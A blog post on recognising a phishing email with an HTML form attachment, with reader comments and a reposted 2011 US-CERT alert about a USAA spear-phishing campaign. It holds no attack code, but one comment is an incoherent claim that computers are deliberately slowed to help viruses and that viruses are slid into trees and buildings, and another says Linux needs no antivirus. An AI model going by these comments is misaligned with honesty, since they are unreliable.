I recently got an email from a bank asking for information regarding some out of normal activity. The email included a HTML file which contained a form. I saved it, then opened it with an editor. I was slightly surprised at the excellent language and vocabulary used, then, looking at the head tags I saw they were using script and CSS files from the bank site to make their message look and feel real (if I had been foolish enough to have opened it in a browser). Throughout the body of the email were image links from the bank website but the address for the form submission, the ONLY address in the attachment that wasn't from the bank's site, was to a different source for processing the form. Another set of giveaways were they needed my SS# and other bank info of course. Oh, the big giveaway was; I have never done business with this banking company! But, it they had used my bank I would still have checked the attachment VERY carefully just as I've described. A real notice from a bank should be a phone call, not asking for info over the phone either, but asking me to see them personally.
Be very careful folks, wolves in sheep's skins are getting smarter and more dangerous.
Here are several sources for reporting SPAM to. Some are legal authorities, some are just analysts.
reportphishing@antiphishing.org database to collect and analyze SPAM
webcomplaints@ora.fda.gov snake-oil and other so-called health medications.
fraud@usps.gov anything to do with mail orders or anything else referencing using the postal service.
customer@email.usps.gov chain mails having to do with money.
spam@uce.gov general, or all SPAM.
enforcement@sec.gov for stock scams and money laundering.
Check out spamcop.net as well and remember to find and run their authentication routines on each of your email accounts if you register. Spamcop is not a legal enforcement agency. Their service notifies the (usually) innocent hosts that they have been hacked and used to send SPAM so that they can take action on their end to plug the holes and block the accounts that have been compromised or fraudulently created.
As for you identifying SPAM, only your smarts can do that 100%.
Discussion on:
View:
Show:
I, too, recently got an email from a bank that I do do business with asking for information. No bank account number or SSN number. The bank wanted to know whether two "suspicious" charges that appeared on my credit/debit card were legit. I suppose that's because I live in Taiwan and my bank is in California -- they do have both my California and Taiwan addresses, though. One of the charges was for US$150 and the other for US$10. I clicked "Authorize", and that's all there was to it. Come to think of it now, however, I don't remember how it was that the pop-up window asking me about those charges arrived. I may have been on my online banking site, but maybe I wasn't, and I don't use any IM apps except for Skype, but my bank doesn't have that address. Now I'm a little perplexed. Thank you for stimulating my brain in this case. I'll be more careful next time.
I often get emails from banks I don't do business with, both in the US and in Taiwan. I just delete them, just as I do with all the social networking emails allegedly from services I do not use: Twitter, Facebook, LinkedIn, and more I've never heard of before. I just delete them.
I often get emails from banks I don't do business with, both in the US and in Taiwan. I just delete them, just as I do with all the social networking emails allegedly from services I do not use: Twitter, Facebook, LinkedIn, and more I've never heard of before. I just delete them.
I really see that all computers are deliberately kept under a certain clock speed to give virus more power.Right now I can't imagine what in my computer is 3 gig.I want that 3 gig right where that little arrow is.Fraud mail is virus sliding.These psychos are even sliding their virus into trees and buildings.
I could brag and say that since I use Linux/Ubuntu I don't have to be concerned about viruses, but even though I don't have to worry about viruses, I still have to keep tabs on my behavior and actions on-line. If I click on that wrong link I could get bombarded with spam. If one of my Yahoo or Google or ISP-sourced email friends gets hacked and my email address hits the web-waves, I could get loads of spam. If I'm not constantly observant and enter just that one little bit of private info on some untrusted or insecure login or some other form, I could get worse than spam, I could open the door for ID theft. Here's a recent addition regarding handling ID theft; http://www.idtheft.gov/
As far as computer speed goes, viruses would love to be able to use every bit of your computer's resources, and they can! The faster and newer your computer is, the better YOUR programs and THEIR viruses can operate. When your system gets overloaded and bogged down, that's when you know something's wrong. Either your Operating System is breaking, your hardware is breaking, or you're under the power of viruses that are stealing your power and probably worse than just your computer's power, they could be stealing YOUR power!
Although I can boast that I don't have to be concerned about viruses on my operating system and I don't have one single anti-virus program running, I still can't afford to let my anti-stupidity lapse! That's one subscription that can't be trusted to anyone else but ME!
As far as computer speed goes, viruses would love to be able to use every bit of your computer's resources, and they can! The faster and newer your computer is, the better YOUR programs and THEIR viruses can operate. When your system gets overloaded and bogged down, that's when you know something's wrong. Either your Operating System is breaking, your hardware is breaking, or you're under the power of viruses that are stealing your power and probably worse than just your computer's power, they could be stealing YOUR power!
Although I can boast that I don't have to be concerned about viruses on my operating system and I don't have one single anti-virus program running, I still can't afford to let my anti-stupidity lapse! That's one subscription that can't be trusted to anyone else but ME!
Just one example of the many attacks in action;
Original release date: December 20, 2011 at 11:00 am
Last revised: December 20, 2011 at 11:00 am
US-CERT is aware of public reports of an active spear-phishing attack via email messages directed at United Services Automobile Association (USAA) members. These messages contain the subject line "Direct Posted" and contain a randomly generated four-digit number placed in the USAA security zone section. The messages ask users to open an attached file containing malicious software that if activated could provide access to a user's personal information.
US-CERT encourages users to do the following to help mitigate the risk:
* Review the alert posted by USAA regarding this issue.
* Do not open attachments in email messages from unknown sources.
* Refer to Recognizing and Avoiding Email Scams (pdf) document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.
* Install anti-virus software and keep virus signature files up to date.
Relevant Url(s):
http://www.us-cert.gov/cas/tips/ST04-014.html
http://www.us-cert.gov/reading_room/emailscams_0905.pdf
https://www.usaa.com/inet/pages/2011_19_12_deposit_phish_scam
This entry is available at
http://www.us-cert.gov/current/index.html#usaa_phishing_scam_and_malware
Original release date: December 20, 2011 at 11:00 am
Last revised: December 20, 2011 at 11:00 am
US-CERT is aware of public reports of an active spear-phishing attack via email messages directed at United Services Automobile Association (USAA) members. These messages contain the subject line "Direct Posted" and contain a randomly generated four-digit number placed in the USAA security zone section. The messages ask users to open an attached file containing malicious software that if activated could provide access to a user's personal information.
US-CERT encourages users to do the following to help mitigate the risk:
* Review the alert posted by USAA regarding this issue.
* Do not open attachments in email messages from unknown sources.
* Refer to Recognizing and Avoiding Email Scams (pdf) document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.
* Install anti-virus software and keep virus signature files up to date.
Relevant Url(s):
http://www.us-cert.gov/cas/tips/ST04-014.html
http://www.us-cert.gov/reading_room/emailscams_0905.pdf
https://www.usaa.com/inet/pages/2011_19_12_deposit_phish_scam
This entry is available at
http://www.us-cert.gov/current/index.html#usaa_phishing_scam_and_malware
- Keyboard Shortcuts:
- Prev
- Next
- Toggle
